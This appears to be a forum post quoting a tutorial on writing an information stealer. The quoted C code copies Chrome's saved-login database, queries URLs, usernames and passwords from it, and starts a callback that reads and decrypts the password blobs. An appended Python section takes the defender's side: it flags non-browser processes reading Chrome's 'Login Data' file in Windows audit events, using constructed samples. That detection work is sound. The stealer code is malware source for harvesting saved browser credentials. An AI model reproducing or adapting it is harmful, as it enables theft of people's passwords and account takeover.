What is a stealer and how to work with it
[QUOTE="Ghosthunter, post: 548, member: 6"]
Code:
int status = CopyFile(browser_db, TEXT(".\\db_tmp"), FALSE);
if (!status) {
 // return 0;
}

Now we connect to the database with the sqlite3_open_v2 command. Its prototype:

Code:
int sqlite3_open_v2(
 const char *filename, /* Database filename (UTF-8) */
 sqlite3 **ppDb, /* OUT: SQLite db handle */
 int flags, /* Flags */
 const char *zVfs /* Name of VFS module to use */
);

First argument is our database; connection information is returned in the second argument, then the open flags are passed, and the fourth argument defines the operating system interface that should use this database connection. In our case, it is not needed. If this function works correctly, the SQLITE_OK value is returned, otherwise an error code is returned.

Code:
sqlite3 *sql_browser_db = NULL;
status = sqlite3_open_v2(TEMP_DB_PATH,
 &sql_browser_db,
 SQLITE_OPEN_READONLY,
 NULL);
if(status != SQLITE_OK) {
 sqlite3_close(sql_browser_db);
 DeleteFile(TEXT(TEMP_DB_PATH));

Now we start directly processing the data in the database. To do this, use the sqlite3_exec() function.

Code:
status = sqlite3_exec(sql_browser_db,
 "SELECT origin_url, username_value, password_value FROM logins",
 crack_chrome_db,
 sql_browser_db,
 &err);
if (status != SQLITE_OK)
 return 0;

This function has a prototype like this:

Code:
int sqlite3_exec(
 sqlite3*, /* An open database */
 const char *sql, /* SQL to be evaluated */
 int (*callback)(void*,int,char**,char**), /* Callback */
 void *, /* 1st argument to callback */
 char **errmsg /* Error msg written here */
);

The first argument is our password database, the second is an SQL command that pulls out the file URL, username, password, and username, the third argument is a callback function that will decrypt passwords, the fourth argument is passed to our callback function, and the fifth argument reports an error.

Let's take a closer look at the callback function that decrypts passwords. It will be applied to each row in the selection of our SELECT query. Its prototype is int (*callback)(void*, int, char**, char**), but we don't need all the arguments, although they should be declared. Let's call the function itself crack_chrome_db, and start writing and declaring the necessary variables:

Code:
int crack_chrome_db(void *db_in, int arg, char **arg1, char **arg2) {
DATA_BLOB data_decrypt, data_encrypt;
sqlite3 *in_db = (sqlite3*)db_in;
BYTE *blob_data = NULL;
sqlite3_blob *sql_blob = NULL;
char *passwds = NULL;
while (sqlite3_blob_open(in_db, "main", "logins", "password_value", count++, 0, &sql_blob) != SQLITE_OK && count <= 20 );

In this loop, we create a BLOB (i.e., a large array of binary data). Next, we allocate memory, read the blob, and initialize the DATA_BLOB fields:

Code:
int sz_blob;
int result;
sz_blob = sqlite3_blob_bytes(sql_blob);
dt_blob = (BYTE *)malloc(sz_blob);
if (!dt_blob) {
 sqlite3_blob_close(sql_blob);
 sqlite3_close(in_db);
}
data_encrypt.pbData = dt_blob;
data_encrypt.cbData = sz_blob;
[/QUOTE]
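A defender's view of the file access described in the quoted post, as an added example that is not part of the original thread: the copy step has to read the browser's credential database from a process that is not the browser, and that read is what file-system auditing can surface. The sketch assumes Windows object-access auditing (Security event 4663) is enabled with a SACL covering the Chrome profile directory; the "Login Data" file name, the install roots and every sample record are assumptions or constructed values, not data from the page.

```python
import ntpath

# Allowlist by full image directory, not file name: any binary can be named
# chrome.exe. Install roots are assumptions; adjust to the fleet's layout.
BROWSER_IMAGE_ROOTS = (
    r"c:\program files\google\chrome\application",
    r"c:\program files (x86)\google\chrome\application",
)
FILE_READ_DATA = 0x1  # read bit in the event 4663 AccessMask

def is_credential_store(object_name):
    # Chrome keeps the `logins` table in a per-profile file named "Login Data".
    path = object_name.lower()
    return (ntpath.basename(path) == "login data"
            and "\\google\\chrome\\user data\\" in path)

def is_browser_image(process_name):
    image_dir = ntpath.dirname(ntpath.normpath(process_name.lower()))
    return image_dir in BROWSER_IMAGE_ROOTS

def suspicious_reads(events):
    # Keep 4663 read events on the credential store made by non-browser images.
    hits = []
    for ev in events:
        if ev.get("EventID") != 4663:
            continue
        if not int(ev["AccessMask"], 16) & FILE_READ_DATA:
            continue
        if (is_credential_store(ev["ObjectName"])
                and not is_browser_image(ev["ProcessName"])):
            hits.append(ev)
    return hits

def _event(process, obj, mask="0x1"):
    return {"EventID": 4663, "AccessMask": mask,
            "ProcessName": process, "ObjectName": obj}

# Constructed sample records (not real telemetry), reduced to the fields used.
PROFILE = r"C:\Users\alice\AppData\Local\Google\Chrome\User Data"
SAMPLE_EVENTS = [
    _event(r"C:\Program Files\Google\Chrome\Application\chrome.exe",
           PROFILE + r"\Default\Login Data"),
    _event(r"C:\Users\alice\AppData\Local\Temp\chrome.exe",
           PROFILE + r"\Default\Login Data"),
    _event(r"C:\Users\alice\Downloads\setup.exe", PROFILE + r"\Profile 1\Login Data"),
    _event(r"C:\Users\alice\Downloads\setup.exe", r"C:\Users\alice\notes.txt"),
]
```

On the sample data `suspicious_reads(SAMPLE_EVENTS)` returns the second and third records: a binary named chrome.exe running from a temp directory, and an unrelated executable reading a second profile's store.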